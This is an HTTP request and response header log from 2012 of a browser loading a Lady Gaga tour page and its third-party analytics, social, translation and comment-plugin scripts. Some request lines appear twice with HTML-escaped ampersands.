Age: 31724
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Wed, 07 Nov 2012 07:55:44 GMT
Content-Length: 34369
Connection: keep-alive
GET /clientapps/v2/counter.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31726
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:56 GMT
Expires: Wed, 07 Nov 2012 07:55:42 GMT
Content-Length: 12474
Connection: keep-alive
GET /clientapps/v2/curation.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31725
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:56 GMT
Expires: Wed, 07 Nov 2012 07:55:43 GMT
Content-Length: 17902
Connection: keep-alive
GET /clientapps/v2/plugins/reply.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31723
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:09 GMT
Expires: Wed, 07 Nov 2012 07:55:45 GMT
Content-Length: 2160
Connection: keep-alive
GET /clientapps/v2/plugins/curation.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31724
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:11 GMT
Expires: Wed, 07 Nov 2012 07:55:44 GMT
Content-Length: 3426
Connection: keep-alive
GET /clientapps/v2/plugins/like.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31724
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Wed, 07 Nov 2012 07:55:44 GMT
Content-Length: 2349
Connection: keep-alive
GET /clientapps/v2/plugins/user-ban.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31719
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Wed, 07 Nov 2012 07:55:49 GMT
Content-Length: 1358
Connection: keep-alive
GET /clientapps/v2/plugins/user-privileges.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31723
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Wed, 07 Nov 2012 07:55:45 GMT
Content-Length: 1649
Connection: keep-alive
GET /clientapps/v2/plugins/community-flag.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31720
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Wed, 07 Nov 2012 07:55:48 GMT
Content-Length: 1648
Connection: keep-alive
GET /clientapps/v2/plugins/metadata-manager.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 31719
Date: Tue, 06 Nov 2012 16:44:28 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Wed, 07 Nov 2012 07:55:49 GMT
Content-Length: 1411
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:29 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /__utm.gif?utmwv=5.3.7&utms=2&utmn=106424948&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1736319984&utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=2&amp;utmn=106424948&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1736319984&amp;utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:11:56 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 487953
Server: GFE/2.0
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352220271214 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352220271214 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Tue, 06 Nov 2012 16:44:31 GMT
Expires: Tue, 13 Nov 2012 16:44:31 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;198f1f6af9aaf2831547da88d246ce2a&quot;
Content-Encoding: gzip
X-FB-Debug: V44Zpgita6AOV0ZAJLTDuk/TtY+urrWnpBrFQjNKRdY=
Content-Length: 57951
Cache-Control: public, max-age=284
Expires: Tue, 06 Nov 2012 16:49:15 GMT
Date: Tue, 06 Nov 2012 16:44:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /translate_static/js/element/main.js HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 02 Jun 2012 02:49:04 GMT
Date: Tue, 06 Nov 2012 16:00:24 GMT
Expires: Tue, 06 Nov 2012 17:00:24 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1542
X-XSS-Protection: 1; mode=block
Age: 2647
Cache-Control: public, max-age=3600
GET /translate_static/css/translateelement.css HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Tue, 22 May 2012 18:21:40 GMT
Date: Tue, 06 Nov 2012 16:14:34 GMT
Expires: Tue, 06 Nov 2012 17:14:34 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 3559
X-XSS-Protection: 1; mode=block
Age: 1797
Cache-Control: public, max-age=3600
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352220271833 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352220271833 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Tue, 06 Nov 2012 16:44:31 GMT
Expires: Tue, 13 Nov 2012 16:44:31 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Tue, 06 Nov 2012 16:44:32 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /__utm.gif?utmwv=5.3.7&utms=3&utmn=1023526956&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=669611385&utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=3&amp;utmn=1023526956&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=669611385&amp;utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:29:28 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 486904
Server: GFE/2.0
GET /translate_static/js/element/10/element_main.js HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 02 Jun 2012 01:19:15 GMT
Date: Tue, 06 Nov 2012 16:18:07 GMT
Expires: Tue, 06 Nov 2012 17:18:07 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 75700
X-XSS-Protection: 1; mode=block
Age: 1586
Cache-Control: public, max-age=3600
GET /__utm.gif?utmwv=5.3.7&utms=4&utmn=62489408&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1449778741&utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=4&amp;utmn=62489408&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1449778741&amp;utmr=http%3A%2F%2Fwww.linaconstruction.net%2Findex.php%3Foption%3Dcom_aicontactsafe&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.2091381384.1352220267.1352220267.1352220267.1%3B%2B__utmz%3D70702477.1352220267.1.1.utmcsr%3Dlinaconstruction.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:29:28 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 486906
Server: GFE/2.0
GET /connect/xd_arbiter.php?version=14 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: kbRja3HTtFJQmhiXrnwdDG7MDTS+a7/1rUwNbzo8xGA=
Content-Length: 9724
Vary: Accept-Encoding
Cache-Control: public, max-age=31458012
Expires: Tue, 05 Nov 2013 19:04:46 GMT
Date: Tue, 06 Nov 2012 16:44:34 GMT
Connection: keep-alive
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=1924p8SdRVo.no./sv=1/am=!5V4AwLTVPeWIaanGfQ/d=1/rs=AItRSTOdOO6Av5tMuP_aUf0Hcw_61Yh1eQ/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-914192948&quot;
Expires: Thu, 06 Dec 2012 02:16:34 GMT
Date: Tue, 06 Nov 2012 02:16:34 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 27846
Age: 52082
GET /connect/xd_arbiter.php?version=14 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: V+o3OvvQWer2YWWTQGU7+nYExHHaRdIv6j/aLiKljHc=
Content-Length: 9716
Vary: Accept-Encoding
Cache-Control: public, max-age=31424231
Expires: Tue, 05 Nov 2013 09:41:48 GMT
Date: Tue, 06 Nov 2012 16:44:37 GMT
Connection: keep-alive
GET /libs/v1/notifications/notifications.css HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Mon, 08 Oct 2012 14:37:01 GMT
Etag: 363263c372483f23fea3cc060d3e78fc
Vary: Accept-Encoding
X-Trans-Id: txe4ac1fb0cc1f46d18f991d02f81b68f6
X-Timestamp: 1349707021.87135
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 01 Dec 2011 00:32:32 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 875
Cache-Control: public, max-age=387
Expires: Tue, 06 Nov 2012 16:51:06 GMT
Date: Tue, 06 Nov 2012 16:44:39 GMT
Connection: keep-alive
GET /v1/users/whoami?callback=jQuery16206497162649963003_1352220262465&appkey=prod.umg&sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F71a7e51a383c21703a91e88436e61b0b&_=1352220279014 HTTP/1.1

Host: api.echoenabled.com
GET /v1/users/whoami?callback=jQuery16206497162649963003_1352220262465&amp;appkey=prod.umg&amp;sessionID=https%3A%2F%2Fbackplane1.janrainbackplane.com%2Fv1.2%2Fbus%2Fumg%2Fchannel%2F71a7e51a383c21703a91e88436e61b0b&amp;_=1352220279014 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset="utf-8"
Connection: close
Server: Yaws 1.92
Date: Tue, 06 Nov 2012 16:44:39 GMT
